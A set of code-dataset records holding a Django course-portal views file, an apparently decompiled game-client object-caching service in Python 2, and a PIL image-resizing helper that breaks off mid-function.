context['form'] = form\n                return render(request, 'portal/add_course.html', context)\n            cd = form.cleaned_data\n            course = form.save(commit=False)\n            course.professor = request.user.professor\n            course.school = request.user.professor.school\n            course.save()\n            for ta in cd['tas']:\n                course.tas.add(ta)\n            for student in cd['roster']:\n                course.roster.add(student)\n            course.save()\n            return redirect(reverse('home'))\n        else:\n            raise Http404\n    else:\n        raise Http404\n\ndef edit_course(request, course_id):\n    context = {}\n    course = get_object_or_404(Course, pk=course_id)\n    context['course'] = course\n    if (request.user.is_authenticated() and hasattr(request.user, 'professor')\n            and course.professor == request.user.professor):\n        if request.method == 'GET':\n            form = CourseForm(instance=course)\n            form.fields['tas'].queryset = (\n                Student.objects.filter(school=request.user.professor.school))\n            form.fields['tas'].initial = course.tas.all() \n            form.fields['roster'].queryset = (\n                Student.objects.filter(school=request.user.professor.school))\n            form.fields['roster'].initial = course.roster.all() \n            context['form'] = form\n            return render(request, 'portal/edit_course.html', context)\n        elif request.method == 'POST':\n            form = CourseForm(request.POST, instance=course)\n            form.fields['tas'].queryset = (\n                Student.objects.filter(school=request.user.professor.school)) \n            form.fields['roster'].queryset = (\n                Student.objects.filter(school=request.user.professor.school))\n            if not form.is_valid():\n                context['form'] = form\n                return render(request, 'portal/edit_course.html', context)\n            cd = form.cleaned_data\n            course = form.save()\n            course.tas.clear()\n            course.roster.clear()\n            for ta in cd['tas']:\n                course.tas.add(ta)\n            for student in cd['roster']:\n                course.roster.add(student)\n            course.save()\n            form.fields['tas'].initial = course.tas.all() \n            form.fields['roster'].initial = course.roster.all() \n            context['course_saved'] = 
True\n            context['form'] = form\n            return render(request, 'portal/edit_course.html', context)\n        else:\n            raise Http404\n    else:\n        raise Http404\n\ndef courses(request):\n    context = {}\n    if (request.user.is_authenticated() and hasattr(request.user, 'student')):\n        courses = Course.objects.filter(school=request.user.student.school)\n        courses = courses.filter(\n            Q(roster__in=[request.user.student])\n            | Q(roster=None))\n        course_list = []\n        for course in courses:\n            if course in request.user.student.subscriptions.all():\n                course_list.append((course, True))\n            else:\n                course_list.append((course, False))\n        context['courses'] = course_list\n        context['school'] = request.user.student.school.name\n        return render(request, 'portal/courses.html', context)\n    else:\n        raise Http404\n\ndef subscription(request, course_id):\n    context = {}\n    course = get_object_or_404(Course, pk=course_id)\n    context['course'] = course\n    if (request.user.is_authenticated() and hasattr(request.user, 'student')\n            and course.school == request.user.student.school):\n        if course in request.user.student.subscriptions.all():\n            request.user.student.subscriptions.remove(course)\n        else:\n            request.user.student.subscriptions.add(course)\n        return redirect(reverse('courses'))\n    else:\n        raise Http404\n\ndef recommend(request):\n    context = {}\n    if (request.user.is_authenticated() and hasattr(request.user, 'student')):\n        if request.method == 'GET':\n            context['form'] = CourseRecommendationForm()\n            return render(request, 'portal/recommend.html', context)\n        elif request.method == 'POST':\n            form = CourseRecommendationForm(request.POST)\n            if not form.is_valid():\n                context['form'] = form\n                return render(request, 'portal/recommend.html', context)\n            else:\n                course_num = form.cleaned_data['course_num']\n                if (CourseRecommendation.objects\n                        .filter(course_number=course_num,\n                                school=request.user.student.school)\n                        .exists()):\n                    rec = CourseRecommendation.objects.get(\n                        course_number=course_num,\n                        school=request.user.student.school)\n                    rec.num_recommendations = rec.num_recommendations + 1\n                    rec.save()\n                else:\n                    rec = CourseRecommendation.objects.create(\n                        course_number=course_num,\n                        num_recommendations=1,\n                        school=request.user.student.school)\n                context['notification'] = \"Thank you for your recommendation.\"\n                context['form'] = CourseRecommendationForm()\n                return render(request, 'portal/recommend.html', context)\n        else:\n            raise Http404\n    else:\n        raise Http404\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"319270193","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\carbon\\common\\script\\net\\objectCaching.py\nimport blue\nimport telemetry\nimport uthread\nimport types\nimport util\nimport zlib\nimport carbon.common.script.net.machobase as macho\nfrom carbon.common.script.net.machoNetAddress import MachoAddress\nfrom carbon.common.script.net.cachedObject import CachedObject as utilCachedObject\nimport random\nimport sys\nimport service\nimport base\nimport binascii\nimport os\nimport const\nimport cPickle\nimport log\nglobals().update(service.consts)\nfrom timerstuff import ClockThis\ncacheSessionVariables = None\n\nclass CoreObjectCachingSvc(service.Service):\n    __guid__ = 'svc.objectCaching'\n    __displayname__ = 'Object Caching Service'\n    __dependencies__ = ['machoNet']\n    
__exportedcalls__ = {'GetCachableObject': [ROLE_ANY],'GetCachedObject': [ROLE_ANY],'GetCachedObjectVersion': [ROLE_ANY],'InvalidateCachedObjects': [\n ROLE_SERVICE],\n 'InvalidateCachedMethodCall': [ROLE_SERVICE],'CacheObject': [ROLE_SERVICE],'RefreshCache': [ROLE_SERVICE],'GetCachedMethodCallVersion': [ROLE_SERVICE]}\n __counters__ = {'cachedBytes': 'normal'}\n __versionchecktimes__ = {'year': const.YEAR360,'6 months': const.MONTH30 * 6,'3 months': const.MONTH30 * 3,'month': const.MONTH30,'week': const.DAY * 7,'day': const.DAY,'12 hours': const.HOUR * 12,'6 hours': const.HOUR * 6,\n '3 hours': const.HOUR * 3,'2 hours': const.HOUR * 2,'1 hour': const.HOUR * 1,'30 minutes': const.MIN * 30,\n '15 minutes': const.MIN * 15,'5 minutes': const.MIN * 5,'1 minute': const.MIN,'30 seconds': const.SEC * 30,'15 seconds': const.SEC * 15,'5 seconds': const.SEC * 5,'1 second': const.SEC}\n __cachedsessionvariables__ = ['languageID']\n\n def __init__(self):\n if macho.mode == 'server':\n self.__dependencies__.append('DB2')\n service.Service.__init__(self)\n self.runid = blue.os.GetWallclockTime()\n self.lastChange = {}\n self.cachedObjects = {}\n self.cachedMethodCalls = {}\n self.methodCallCachingDetails = {}\n self.cachedObjectReturnStatistics = {}\n self.lastFileWriteTime = {}\n self.downloadedCachedObjects = {}\n\n def GetHtmlStateDetails(self, k, v, detailed):\n import htmlwriter\n if k == 'cachedObjects':\n if detailed:\n hd = ['ObjectID', 'Time Stamp',\n 'Version', 'Shared', 'NodeID', 'Size']\n li = []\n for ik, iv in v.iteritems():\n l = '???'\n if iv.pickle:\n l = '%d' % len(iv.pickle)\n if iv.compressed:\n l += ' (compressed)'\n li.append([iv.objectID, util.FmtDateEng(iv.version[0]), iv.version[1], iv.shared, iv.nodeID, l])\n\n return ('Object Cache', htmlwriter.GetTable(hd, li, useFilter=True))\n else:\n return ('Object Cache', '%d entries' % len(v))\n elif k == 'cachedObjectReturnStatistics':\n if detailed:\n hd = ['ObjectID', 'Count', 'Bytes']\n li = []\n for ik, iv in v.iteritems():\n if type(ik) == types.TupleType and len(ik) == 2 and ik[0] in sm.services:\n ik = '%s::%s' % ik\n li.append([htmlwriter.Swing(str(ik)), iv[0], iv[1]])\n\n li.sort()\n return ('Object Cache Statistics', htmlwriter.GetTable(hd, li, useFilter=True))\n else:\n totCalls = 0\n totBytes = 0\n for each in v.itervalues():\n totCalls += each[0]\n totBytes += each[1]\n\n return ('Object Cache Statistics', '%d distinct objects returned via %d calls, totalling %d bytes' % (len(v), totCalls, totBytes))\n\n def Run(self, memStream=None):\n service.Service.Run(self, memStream)\n self.methodCallCachingDetails = {}\n self.cachedMethodCalls = {}\n self.cachedObjects = {}\n\n @telemetry.ZONE_METHOD\n def LoadCache(self, ipaddress):\n ipaddress = ipaddress.lower().split(':')[0]\n self.cachePath = blue.paths.ResolvePathForWriting(u'cache:/MachoNet/%s/%d/' % (ipaddress, macho.version))\n paths = [blue.paths.ResolvePath(u'cache:/'), blue.paths.ResolvePathForWriting(u'cache:/MachoNet/'), blue.paths.ResolvePathForWriting(u'cache:/MachoNet/%s' % ipaddress), self.cachePath, self.cachePath + 'CachedMethodCalls', self.cachePath + 'MethodCallCachingDetails',\n self.cachePath + 'CachedObjects']\n self.methodCallCachingDetails = {}\n self.cachedMethodCalls = {}\n self.cachedObjects = {}\n for path in paths:\n try:\n os.listdir(path)\n except OSError:\n os.mkdir(path)\n sys.exc_clear()\n\n def RefreshCache(self):\n self.cachedMethodCalls = {}\n\n def __CacheIsDirty(self, what, key):\n if macho.mode == 'client':\n ret = 
blue.os.GetWallclockTime()\n shouldFlush = len(self.lastChange) == 0\n self.lastChange[what, key] = ret\n filename = self.cachePath + what + '/%s.cache' % self.KeyToFileName(key)\n self.downloadedCachedObjects[key] = filename\n if shouldFlush:\n uthread.worker('objectCaching::FlushCache', self.__FlushCache, True)\n return ret\n\n def __FlushCache(self, yieldFirst):\n if yieldFirst:\n blue.pyos.synchro.Yield()\n while self.lastChange:\n flushWhat, lastChange = self.lastChange.items()[0]\n del self.lastChange[flushWhat]\n what, key = flushWhat\n filename = self.cachePath + what + '/%s.cache' % self.KeyToFileName(key)\n if os.access(filename, os.F_OK) and not os.access(filename, os.W_OK):\n try:\n os.chmod(filename, 666)\n except StandardError:\n self.LogWarn('Failed to reset access priviledges on file from file system (', filename, ')')\n sys.exc_clear()\n\n try:\n store = getattr(self, what)\n if key not in store:\n try:\n os.unlink(filename)\n self.LogInfo('Deleted ', key, ' from file system (', filename, ')')\n except StandardError as e:\n self.LogWarn('Failed to delete file from file system (', filename, '):', e)\n sys.exc_clear()\n\n else:\n ob = store[key]\n if not isinstance(ob, uthread.Semaphore):\n blue.AtomicFileWrite(filename, blue.marshal.Save((key, ob)))\n self.LogInfo('Wrote ', key, ' to file (', filename, ')')\n self.lastFileWriteTime[self.__KeyFromFileName(filename)] = os.path.getmtime(filename)\n except Exception:\n log.LogException('Error while writing cached data')\n sys.exc_clear()\n\n def KeyToFileName(self, key):\n pickle = cPickle.dumps(key)\n checksum = binascii.crc_hqx(pickle, 0)\n return '%x' % checksum\n\n def __KeyFromFileName(self, fileName):\n fileName = fileName.replace('\\\\', '/')\n i = fileName.rindex('/')\n if i >= 0:\n fileName = fileName[i:]\n i = fileName.rindex('.')\n if i >= 0:\n fileName = fileName[0:i]\n fileName = fileName.lower()\n return fileName\n\n def InvalidateCachedMethodCall(self, serviceOrObjectName, method, *args):\n return self.InvalidateCachedMethodCalls([\n (serviceOrObjectName, method,\n args)])\n\n def InvalidateCachedMethodCalls(self, methodcalls):\n invalidate = []\n for serviceOrObjectName, method, args in methodcalls:\n si = []\n details = self.__GetMethodCallCachingDetails(None, serviceOrObjectName, method)\n if details is not None:\n if 'sessionInfo' in details:\n si = [getattr(session, details['sessionInfo'], None)]\n k = tuple([serviceOrObjectName, method] + si + list(args))\n invalidate.append(k)\n\n self.InvalidateCachedObjects(invalidate)\n return\n\n def __ListPartialMatch(self, l, o, pm):\n if len(pm) == len(l) and len(l) == len(o):\n for i in range(len(l)):\n if pm[i]:\n if i < 2:\n if type(o[i]) in (types.TupleType, types.ListType):\n if l[i] not in o[i]:\n return 0\n if not l[i] == o[i]:\n return 0\n\n return 1\n return 0\n\n def InvalidateCachedObjects(self, objectIDs, forward=1):\n deleted = 0\n for each in objectIDs:\n if each in self.cachedMethodCalls:\n del self.cachedMethodCalls[each]\n self.__CacheIsDirty('cachedMethodCalls', each)\n if type(each) in (\n types.TupleType, types.ListType):\n objectID = each[0]\n version = each[1]\n else:\n objectID = each\n version = None\n if objectID in self.cachedObjects and not isinstance(self.cachedObjects[objectID], uthread.Semaphore):\n if version is None or self.__OlderVersion(self.cachedObjects[objectID].version, version):\n del self.cachedObjects[objectID]\n self.__CacheIsDirty('cachedObjects', objectID)\n\n gpcs = sm.services['machoNet']\n gpcs.GetGPCS()\n if macho.mode 
== 'client':\n return\n else:\n if macho.mode == 'proxy':\n for eachNodeID in sm.services['machoNet'].GetConnectedSolNodes():\n gpcs.RemoteServiceNotify(self.session, MachoAddress(nodeID=eachNodeID, service='objectCaching'), 'objectCaching', 'InvalidateCachedObjects', objectIDs, 0)\n\n elif forward and sm.services['machoNet'].GetConnectedProxyNodes():\n eachNodeID = random.choice(sm.services['machoNet'].GetConnectedProxyNodes())\n gpcs.RemoteServiceNotify(self.session, MachoAddress(nodeID=eachNodeID, service='objectCaching'), 'objectCaching', 'InvalidateCachedObjects', objectIDs, 0)\n return\n\n def GetCachedObject(self, objectID):\n if objectID in self.cachedObjects and not isinstance(self.cachedObjects[objectID], uthread.Semaphore):\n return self.cachedObjects[objectID].object\n else:\n return None\n\n def GetCachedObjectVersion(self, objectID):\n if objectID in self.cachedObjects and not isinstance(self.cachedObjects[objectID], uthread.Semaphore):\n v = self.cachedObjects[objectID].version\n if v[0] is None:\n return v[1]\n else:\n return v\n return\n\n def GetCachableObject(self, shared, objectID, objectVersion, nodeID):\n callTimer = base.CallTimer('objectCaching::GetCachableObject')\n try:\n if macho.mode == 'client':\n gpcs = sm.services['machoNet']\n else:\n gpcs = sm.services['machoNet']\n gpcs.GetGPCS()\n if objectID in self.cachedObjects and isinstance(self.cachedObjects[objectID], utilCachedObject) and macho.mode == 'proxy':\n if sm.services['machoNet'].GetTransportOfNode(self.cachedObjects[objectID].__nodeID__) is None:\n del self.cachedObjects[objectID]\n if objectID in self.cachedObjects and isinstance(self.cachedObjects[objectID], uthread.Semaphore) or objectID not in self.cachedObjects or not isinstance(self.cachedObjects[objectID], uthread.Semaphore) and self.__OlderVersion(self.cachedObjects[objectID].version, objectVersion):\n if objectID not in self.cachedObjects or not isinstance(self.cachedObjects[objectID], uthread.Semaphore) and self.__OlderVersion(self.cachedObjects[objectID].version, objectVersion):\n self.cachedObjects[objectID] = uthread.Semaphore(('objectCaching', objectID))\n while 1:\n semaphore = self.cachedObjects[objectID]\n semaphore.acquire()\n try:\n if not isinstance(self.cachedObjects[objectID], uthread.Semaphore):\n self.__UpdateStatisticsGetCachableObject(objectID, objectVersion, self.cachedObjects[objectID])\n return self.cachedObjects[objectID]\n if macho.mode == 'client':\n if shared:\n if not sm.services['machoNet'].myProxyNodeID:\n proxyNodeID = nodeID\n else:\n proxyNodeID = sm.services['machoNet'].myProxyNodeID\n remoteObject = gpcs.RemoteServiceCall(session, proxyNodeID, 'objectCaching', 'GetCachableObject', shared, objectID, objectVersion, nodeID)\n else:\n remoteObject = gpcs.RemoteServiceCall(session, nodeID, 'objectCaching', 'GetCachableObject', shared, objectID, objectVersion, nodeID)\n self.cachedObjects[objectID] = remoteObject\n self.__CacheIsDirty('cachedObjects', objectID)\n elif macho.mode == 'proxy':\n remoteObject = gpcs.RemoteServiceCall(self.session, nodeID, 'objectCaching', 'GetCachableObject', shared, objectID, objectVersion, nodeID)\n if not remoteObject.compressed and len(remoteObject.pickle) > 200:\n try:\n t = ClockThis('objectCaching::compress', zlib.compress, remoteObject.pickle, 1)\n except zlib.error as e:\n raise RuntimeError('Compression Failure: ' + strx(e))\n\n if len(t) < len(remoteObject.pickle):\n remoteObject.compressed = 1\n remoteObject.pickle = t\n if remoteObject.shared:\n self.cachedObjects[objectID] = 
remoteObject\n self.__CacheIsDirty('cachedObjects', objectID)\n else:\n del self.cachedObjects[objectID]\n return remoteObject\n elif macho.mode == 'server':\n self.LogError(\"Some dude asked me for a cached object I just don't have, objectID=\", objectID, ', objectVersion=', objectVersion, ', nodeID=', nodeID)\n del self.cachedObjects[objectID]\n raise RuntimeError(\"I don't have %s, which just don't make sense....\" % repr(objectID))\n finally:\n semaphore.release()\n\n if not isinstance(self.cachedObjects[objectID], uthread.Semaphore):\n self.__UpdateStatisticsGetCachableObject(objectID, objectVersion, self.cachedObjects[objectID])\n return self.cachedObjects[objectID]\n\n else:\n if macho.mode == 'server' and not self.cachedObjects[objectID].shared:\n tmp = self.cachedObjects[objectID]\n self.__UpdateStatisticsGetCachableObject(objectID, objectVersion, self.cachedObjects[objectID])\n del self.cachedObjects[objectID]\n return tmp\n self.__UpdateStatisticsGetCachableObject(objectID, objectVersion, self.cachedObjects[objectID])\n return self.cachedObjects[objectID]\n finally:\n callTimer.Done()\n\n return\n\n def CacheObject(self, object):\n shared, objectID, objectVersion, nodeID, cachedObject, thePickle, compressed = object.MachoGetCachedObjectGuts()\n if objectID not in self.cachedObjects or not isinstance(self.cachedObjects[objectID], uthread.Semaphore) and self.__NewerVersion(self.cachedObjects[objectID].version, objectVersion):\n self.LogInfo('CacheObject: inserting or updating ', objectID, ' into cachedObjects')\n if cachedObject is not None or thePickle is not None:\n if objectID in self.cachedObjects and self.cachedObjects[objectID].pickle is not None:\n self.cachedBytes.Dec(len(self.cachedObjects[objectID].pickle))\n self.cachedObjects[objectID] = CachedObject(shared, objectID, objectVersion, nodeID, cachedObject, thePickle, compressed)\n if thePickle is not None:\n self.cachedBytes.Add(len(thePickle))\n else:\n log.LogTraceback('Unexpected CacheObject request')\n self.__CacheIsDirty('cachedObjects', objectID)\n return\n\n def __NewerVersion(self, oldVersion, newVersion):\n if oldVersion[1] != newVersion[1]:\n return newVersion[0] > oldVersion[0]\n return 0\n\n def __OlderVersion(self, oldVersion, newVersion):\n if oldVersion[1] != newVersion[1]:\n return oldVersion[0] < newVersion[0]\n return 0\n\n def __GetMethodCallCachingDetails(self, serviceOrObject, serviceOrObjectName, method):\n if serviceOrObject is not None:\n exportedCalls = getattr(serviceOrObject, '__exportedcalls__', None)\n if exportedCalls is not None:\n methodInfo = exportedCalls.get(method, None)\n if methodInfo is not None:\n if type(methodInfo) == types.DictType and 'caching' in methodInfo:\n return methodInfo['caching']\n return\n else:\n return self.methodCallCachingDetails.get((serviceOrObjectName, method), None)\n return\n\n def GetCachedMethodCallVersion(self, serviceOrObject, serviceOrObjectName, method, args):\n details = self.__GetMethodCallCachingDetails(serviceOrObject, serviceOrObjectName, method)\n if details is not None:\n si = []\n if details.get('sessionInfo', None):\n si = [\n getattr(session, details['sessionInfo'], None)]\n k = tuple([serviceOrObjectName, method] + si + list(args))\n if k in self.cachedMethodCalls:\n if isinstance(self.cachedMethodCalls[k]['rret'].result, utilCachedObject) and macho.mode == 'proxy':\n if sm.services['machoNet'].GetTransportOfNode(self.cachedMethodCalls[k]['rret'].result.__nodeID__) is None:\n del self.cachedMethodCalls[k]\n self.LogInfo('ObjectCaching ', 
serviceOrObjectName, '::', method, '(', args, ') says cachable, but on dead server so go for it')\n                    return 0\n            return self.cachedMethodCalls[k]['version'][1]\n        return 0\n\n    def __UpdateStatisticsGetCachableObject(self, objectID, objectVersion, object):\n        k = objectID\n        if len(objectID) == 3 and objectID[0] == 'Method Call':\n            if objectID[1] != macho.mode:\n                k = '::'.join(objectID[2][:2])\n            else:\n                k = objectID[1:]\n        k = self.__SanitizeCachingKey(k)\n        if k not in self.cachedObjectReturnStatistics:\n            self.cachedObjectReturnStatistics[k] = [\n             0, 0]\n        self.cachedObjectReturnStatistics[k][0] += 1\n        if macho.mode != 'client':\n            self.cachedObjectReturnStatistics[k][1] += object.GetSize()\n\n    def __SanitizeCachingKey(self, k):\n        if type(k) in (types.ListType, types.TupleType):\n            ret = []\n            for each in k:\n                tmp = self.__SanitizeCachingKey(each)\n                if tmp:\n                    ret.append(tmp)\n\n            if ret and ret[0] == macho.mode:\n                ret = ret[1:]\n            if len(ret) == 1:\n                return ret[0]\n            return tuple(ret)\n        elif type(k) in (types.IntType, types.LongType, types.FloatType):\n            return 0\n        else:\n            return k\n\n    def ReturnCachedResults(self, cachable, versionCheck, throwOK, cachedResultRecord, cacheKey, cacheDetails):\n        base.CachedMethodCalled(cacheKey, cacheDetails)\n        return (cachable, versionCheck, throwOK, cachedResultRecord, cacheKey, cacheDetails)\n\n    def PerformCachedMethodCall(self, serviceOrObject, serviceOrObjectName, method, args, remoteVersion=None):\n        details = self.__GetMethodCallCachingDetails(serviceOrObject, serviceOrObjectName, method)\n        if details is not None:\n            si = []\n            if details.get('sessionInfo', None):\n                si = [\n                 getattr(session, details['sessionInfo'], None)]\n            k = tuple([serviceOrObjectName, method] + si + list(args))\n            if k in self.cachedMethodCalls:\n                if isinstance(self.cachedMethodCalls[k]['rret'].result, utilCachedObject) and macho.mode == 'proxy':\n                    if sm.services['machoNet'].GetTransportOfNode(self.cachedMethodCalls[k]['rret'].result.__nodeID__) is None:\n                        del self.cachedMethodCalls[k]\n                        self.LogInfo('ObjectCaching ', serviceOrObjectName, '::', method, '(', args, ') says cachable, but on dead server so go for it')\n                        return self.ReturnCachedResults(1, 0, 0, None, k, details)\n                versionCheck = self.__ShouldVersionCheck(details, self.cachedMethodCalls[k])\n                if remoteVersion is None or remoteVersion == 1 or self.__OlderVersion(remoteVersion, self.cachedMethodCalls[k]['version']):\n                    throwOK = 0\n                else:\n                    throwOK = 1\n                self.cachedMethodCalls[k]['used'] = blue.os.GetWallclockTime()\n                if versionCheck:\n                    self.LogInfo('ObjectCaching ', serviceOrObjectName, '::', method, '(', args, ') returning a cached result that requires version checking.')\n                else:\n                    self.LogInfo('ObjectCaching ', serviceOrObjectName, '::', method, '(', args, ') returning a cached result')\n                return self.ReturnCachedResults(1, versionCheck, throwOK, self.cachedMethodCalls[k], k, details)\n            elif remoteVersion is not None and remoteVersion != 1 and self.__GetVersionCheckType(details) == 'never':\n                self.LogInfo('ObjectCaching ', serviceOrObjectName, '::', method, '(', args, ') the caller seems to know the result, and we can live with that')\n                return self.ReturnCachedResults(1, 0, 1, None, k, details)\n            else:\n                if remoteVersion is not None and remoteVersion != 1:\n                    self.LogInfo('ObjectCaching ', serviceOrObjectName, '::', method, '(', args, ') is cachable, but not cached. 
remoteVersion=', remoteVersion, ', details=', details, ', vc type=', self.__GetVersionCheckType(details))\n else:\n self.LogInfo('ObjectCaching ', serviceOrObjectName, '::', method, '(', args, ') is cachable, but not cached.')\n return self.ReturnCachedResults(1, 0, 0, None, k, details)\n else:\n return self.ReturnCachedResults(0, 0, 0, None, None, None)\n return\n\n if cacheSessionVariables is not None:\n __cachedsessionvariables__ = tuple(list(cacheSessionVariables) + __cachedsessionvariables__)\n else:\n __cachedsessionvariables__ = tuple(__cachedsessionvariables__)\n\n def CacheMethodCall(self, serviceOrObjectName, method, args, cmcr):\n k = (\n serviceOrObjectName, method)\n if k not in self.methodCallCachingDetails:\n self.methodCallCachingDetails[k] = cmcr.details\n self.__CacheIsDirty('methodCallCachingDetails', k)\n details = cmcr.details\n else:\n details = self.methodCallCachingDetails[serviceOrObjectName, method]\n base.CachedMethodCalled(k, cmcr.details)\n if self.__GetVersionCheckType(details) is not None:\n si = []\n if details.get('sessionInfo', None):\n if macho.mode != 'client' and details['sessionInfo'] not in self.__cachedsessionvariables__:\n self.LogInfo('ObjectCaching cannot cache by sessionInfo ', details['sessionInfo'], ' on ', macho.mode)\n return\n gsi = getattr(session, details['sessionInfo'], None)\n si = [gsi]\n ret, version = cmcr.GetResult(), cmcr.GetVersion()\n k = tuple([serviceOrObjectName, method] + si + list(args))\n used = self.__CacheIsDirty('cachedMethodCalls', k)\n self.cachedMethodCalls[k] = {'lret': ret,'rret': cmcr,\n 'version': version,'used': used,'runid': self.runid}\n self.LogInfo('ObjectCaching ', serviceOrObjectName, '::', method, '(', args, ') cached the method call for future reference.')\n return\n\n def __GetVersionCheckType(self, details):\n vc = details.get('versionCheck', 'run')\n if type(vc) == types.TupleType:\n if macho.mode == 'server':\n vc = vc[2]\n elif macho.mode == 'proxy':\n vc = vc[1]\n else:\n vc = vc[0]\n return vc\n\n def IsCachedOnProxy(self, details):\n if details.get('sessionInfo', None) and details.get('sessionInfo', None) not in self.__cachedsessionvariables__:\n return False\n else:\n vc = details.get('versionCheck', 'run')\n if type(vc) == types.TupleType:\n return vc[1] is not None\n return vc is not None\n\n def UpdateVersionCheckPeriod(self, cacheKey):\n try:\n cacheEntry = self.cachedMethodCalls.get(cacheKey, None)\n if cacheEntry is None:\n self.LogWarn('ObjectCaching unable to update validity period for cache key', cacheKey, 'key not valid')\n else:\n self.LogInfo('ObjectCaching resetting validity period for cache key', cacheKey)\n cacheEntry['version'][0] = blue.os.GetWallclockTime()\n except Exception as e:\n log.LogException('ObjectCaching unknown exception while resetting validity period')\n\n return\n\n def __ShouldVersionCheck(self, details, info):\n vc = self.__GetVersionCheckType(details)\n now = blue.os.GetWallclockTime()\n if type(vc) in types.StringTypes:\n if vc == 'never':\n return 0\n if vc == 'always':\n return 1\n if vc in ('run', 'utcmidnight', 'utcmidnight_or_3hours'):\n if info.get('runid', 0) == self.runid:\n if vc != 'run':\n midnight = (info.get('runid', 0) / const.DAY + 1) * const.DAY\n if vc == 'utcmidnight':\n maxAge = midnight - now\n else:\n maxAge = min(midnight - now, 3 * const.HOUR)\n else:\n return 0\n else:\n info['runid'] = self.runid\n return 1\n else:\n maxAge = self.__versionchecktimes__[vc]\n else:\n maxAge = int(vc)\n age = now - info['version'][0]\n if maxAge <= age:\n 
return 1\n else:\n return 0\n\n\nclass CachedObject():\n __guid__ = 'objectCaching.CachedObject'\n __passbyvalue__ = 1\n\n def __init__(self, s, oid, v, n, o, p, c):\n self.version, self.object, self.nodeID, self.shared, self.pickle, self.compressed, self.objectID = (\n v, o, n, s,\n p, c, oid)\n\n def __getstate__(self):\n if self.pickle is not None:\n o = None\n else:\n o = self.object\n return (self.version, o, self.nodeID,\n self.shared, self.pickle,\n self.compressed, self.objectID)\n\n def __str__(self):\n try:\n return 'objectCaching.CachedObject(objectID=%s, version=%s, nodeID=%s, shared=%s, compressed=%s)' % (self.objectID,\n self.version, self.nodeID,\n self.shared, self.compressed)\n except:\n sys.exc_clear()\n return 'objectCaching.CachedObject(???)'\n\n def __setstate__(self, state):\n self.object = None\n self.version, self.object, self.nodeID, self.shared, self.pickle, self.compressed, self.objectID = state\n return\n\n def GetObject(self):\n if self.object is None:\n if self.pickle is None:\n raise RuntimeError('Getting cached object contents, but both the object and the pickle are none')\n try:\n if self.compressed:\n try:\n dasPickle = zlib.decompress(self.pickle)\n except zlib.error as e:\n raise RuntimeError('Decompression Failure: ' + strx(e))\n\n self.object = blue.marshal.Load(dasPickle)\n else:\n self.object = blue.marshal.Load(self.pickle)\n except:\n sm.GetService('objectCaching').LogError('Failed to acquire object from objectCaching.CachedObject, self=', self)\n raise\n\n return self.object\n\n def CompressedPart(self):\n if not self.compressed or self.pickle is None:\n return 0\n else:\n return len(self.pickle)\n\n def GetSize(self):\n if self.pickle is None:\n self.pickle = blue.marshal.Save(self.object)\n return len(self.pickle)\n\n\nclass CachedMethodCallResult():\n __guid__ = 'objectCaching.CachedMethodCallResult'\n __passbyvalue__ = 1\n\n def __init__(self, key, details, result):\n self.details = details\n if isinstance(result, utilCachedObject):\n self.result = result\n self.version = None\n elif sm.services['objectCaching'].IsCachedOnProxy(details) and macho.mode != 'client':\n self.result = utilCachedObject(1, ('Method Call', macho.mode, key), result)\n sm.services['objectCaching'].CacheObject(self.result)\n self.version = None\n else:\n self.result = blue.marshal.Save(result)\n self.version = [blue.os.GetWallclockTime(), zlib.adler32(self.result)]\n return\n\n def __getstate__(self):\n return (\n self.details, self.result,\n self.version)\n\n def __setstate__(self, state):\n self.details, self.result, self.version = state\n\n def GetVersion(self):\n if isinstance(self.result, utilCachedObject):\n return list(self.result.__objectVersion__)\n return self.version\n\n def IsSameVersion(self, machoVersion):\n if machoVersion != 1:\n return self.GetVersion()[1] == machoVersion[1]\n return 0\n\n def GetResult(self):\n if isinstance(self.result, utilCachedObject):\n return self.result.GetCachedObject()\n else:\n return blue.marshal.Load(self.result)\n\n def __str__(self):\n try:\n if isinstance(self.result, utilCachedObject):\n return 'objectCaching.CachedMethodCallResult(version=%s, result=%s)' % (self.version, self.result)\n return 'objectCaching.CachedMethodCallResult(version=%s)' % (self.version,)\n except:\n sys.exc_clear()\n return 'objectCaching.CachedMethodCallResult(???)'\n\n\nclass CacheOK(StandardError):\n __guid__ = 'objectCaching.CacheOK'\n __passbyvalue__ = 1\n\n def __init__(self, value='CacheOK', *args):\n StandardError.__init__(self, value, 
*args)","sub_path":"client/carbon/common/script/net/objectCaching.py","file_name":"objectCaching.py","file_ext":"py","file_size_in_byte":32027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"38131709","text":"from PIL import Image\nimport uuid\n\ndef toDimensions(image_file, out_file, dim_x, dim_y, allowLow=True, return_file_object=False):\n im = Image.open(image_file)\n im_x = im.size[0]\n im_y = im.size[1]\n flag = True\n if not allowLow:\n flag = (im_x >= dim_x) and (im_y >= dim_y)\n if flag:\n aspectRatioIn = im_x / float(im_y)\n aspectRatioOut = dim_x / float(dim_y)\n if(aspectRatioIn > aspectRatioOut):\n fin_y = im_y\n fin_x = im_y * aspectRatioOut\n elif(aspectRatioIn < aspectRatioOut):\n fin_y = im_x/aspectRatioOut\n fin_x = im_x\n else:\n fin_x = im_x\n fin_y = im_y\n box = (int((im_x - fin_x)/2), int((im_y - fin_y)/2), int((im_x + fin_x)/2), int((im_y + fin_y)/2) )\n im = im.crop(box)\n im = im.resize((dim_x,dim_y))\n if return_file_object:\n from StringIO import StringIO\n out_file = StringIO()\n im.convert('RGB').save(out_file, \"jpeg\")\n out_file.seek(0)\n else:\n im.convert('RGB').save(out_file, \"jpeg\")\n return out_file\n else:\n raise Exception(\"Small Size\")\n\n\ndef sanitize_profile_pic(image_file):\n path = '/tmp/{random_string}.jpeg'.format(random_string=uuid.uuid1().hex)\n toDimensions(image_file, path, 240, 240)\n return path\n\ndef get_profile_pic_thumb(image_file):\n path = '/tmp/{random_string}.jpeg'.format(random_string=uuid.uuid1().hex)\n toDimensions(image_file, path, 50, 50)\n return path\n\ndef sanitize_cover_pic(image_file):\n path = '/tmp/{random_string}.jpeg'.format(random_string=uuid.uuid1().hex)\n toDimensions(image_file, path, 320, 560)\n return path\n\ndef resize_video_thumb(image_file, height=262, width=262):\n path = ''\n return toDimensions(image_file, path, height, width, 